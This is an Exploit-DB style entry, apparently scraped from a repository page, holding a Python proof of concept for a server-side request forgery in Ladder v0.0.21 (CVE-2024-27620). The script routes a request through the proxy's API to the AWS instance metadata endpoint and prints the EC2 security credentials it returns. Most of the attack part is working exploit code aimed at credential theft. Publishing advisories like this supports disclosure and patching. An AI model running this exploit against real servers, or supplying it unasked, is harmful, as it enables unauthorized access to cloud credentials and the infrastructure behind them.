60a90afc8d
7 changes to exploits/shellcodes/ghdb Ladder v0.0.21 - Server-side request forgery (SSRF) TP-Link TL-WR740N - Buffer Overflow 'DOS' Numbas < v7.3 - Remote Code Execution Akaunting < 3.1.3 - RCE DataCube3 v1.0 - Unrestricted file upload 'RCE' Hide My WP < 6.2.9 - Unauthenticated SQLi
18 lines
No EOL
902 B
Text
18 lines
No EOL
902 B
Text
# Exploit Title: Ladder v0.0.21 - Server-side request forgery (SSRF)
|
|
# Date: 2024-01-20
|
|
# Exploit Author: @_chebuya
|
|
# Software Link: https://github.com/everywall/ladder
|
|
# Version: v0.0.1 - v0.0.21
|
|
# Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0)
|
|
# CVE: CVE-2024-27620
|
|
# Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context. An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs
|
|
|
|
import requests
|
|
import json
|
|
|
|
target_url = "http://127.0.0.1:8080/api/"
|
|
imdsv1_url = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"
|
|
|
|
r = requests.get(target_url + imdsv1_url)
|
|
response_json = json.loads(r.text)
|
|
print(response_json["body"]) |